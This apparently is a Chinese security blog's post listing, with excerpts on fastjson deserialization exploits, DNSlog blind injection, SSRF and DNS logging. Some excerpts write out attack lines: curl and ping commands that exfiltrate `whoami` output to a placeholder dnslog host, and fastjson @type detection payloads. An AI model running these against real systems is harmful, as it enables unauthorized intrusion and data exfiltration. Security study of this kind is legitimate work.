• 2024-07-27fastjson反序列化漏洞原理及<=1.2.24&<=1.2.47&Fastjson v1.2.80简单利用&不出网判断&修复方法
    1、什么是fastjsonfastjson是一个有阿里开发的一个开源Java类库,可以将Java对象转换为JSON格式(序列化),当然它也可以将JSON字符串转换为Java对象(反序列化)。2、漏洞原理FastJson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类,并调⽤该类的set/get⽅法
  • 2024-05-12DNSlog注入原理
    DNSlog注入的原理主要涉及将盲注转换为显错注入,通过利用域名系统(DNS)的解析过程来获取信息。以下是DNSlog注入原理的详细解释:DNS解析过程:当用户在浏览器中输入一个域名时,本地域名服务器(LocalDNS)会首先查询自身缓存中是否存在该域名的IP地址记录。如果没有,它会向根域名服务器(Roo
  • 2024-04-042024-HW --->SSRF
    这不是马上准备就要护网了嘛,如火如荼的报名ing!!!那么小编就来查缺补漏一下以前的web漏洞,也顺便去收录一波poc!!!!今天讲的主人公呢就是SSRF,以前学的时候,感觉有点没有学懂,趁现在二刷一遍1.SSRF的原理SSRF(Server-SideRequestForgery)服务器端请求伪造,一种由攻击者构造请求,由
  • 2023-08-25DNSLOG平台搭建及其原理分析
    一、DNS基本概念0x1:DNS中不同域名类型概念DNS的全称是DomainNameSystem(网络名称系统),它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如littlehann.com,网络上的DNSServer会将该域名解析,并找到对应的真实IP如101.37.97.51,使用户可以访问这台服务器上
  • 2023-08-18Dnslog回显使用指南
    一、命令执行场景Liunx/Unix/MacOS系统:curlhttp://ip.port.xxx.dnslog.org/`whoami`ping`whoami`.ip.port.xxx.dnslog.orgWindows系统:ping%USERNAME%.xxx.dnslog.org二、SQL注入场景SQLServer数据库:DECLARE@hostvarchar(1024);SELECT@host=(SELECTTOP1master.d
  • 2023-05-31sql注入-DNSlog注入
    sql注入-DNSlog注入使用场景:由于在盲注过程中,手工测试需要花费大量的时间,我们可能会想到使用sqlmap直接去跑出数据但在实际测试中,使用sqlmap跑盲注,发包太多,网站很可能把ip给封掉,也许你会考虑使用代理池这个时候可以尝试利用DNSlog注入,可以快速得到结果原理:在某些无法直接
  • 2023-04-29Fastjson检测和利用
    漏洞检测:`DNSlog{"@type":"java.net.InetAddress","val":"dnslog.cn"}在49以下才能触发,因为这个gadget在49被禁止了,可用于检测具体版本{"@type":"java.net.Inet4Address","val":"dnslog"}{"@type":"
  • 2023-03-29dnslog小技巧
    大自然的搬运工转载自https://www.cnblogs.com/sstfy/p/10351807.htmldnslog小技巧 一、dnslog利用场景主要针对无回显的情况。Sql-BlindRCESSRFRFI(RemoteFile
  • 2023-02-26DNSlog
    1.原理通过恶意payload组合的三级域名后对服务器发起的DNS请求。  2.利用场景SQL注入RCE(远程命令执行)SSRF(服务端请求伪造)RFI(远程文件包含)3.Payload example
  • 2023-02-02开启并分析DNS debug日志
    开启DNS调试日志,记录DNS查询日志  当文件达到20M后,会自动重写新日志DNSDeugLog,使用如下脚本进行分析脚本:##################################################
  • 2022-11-11fastjson1.2.47rce
    漏洞产生原因fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。  环境搭建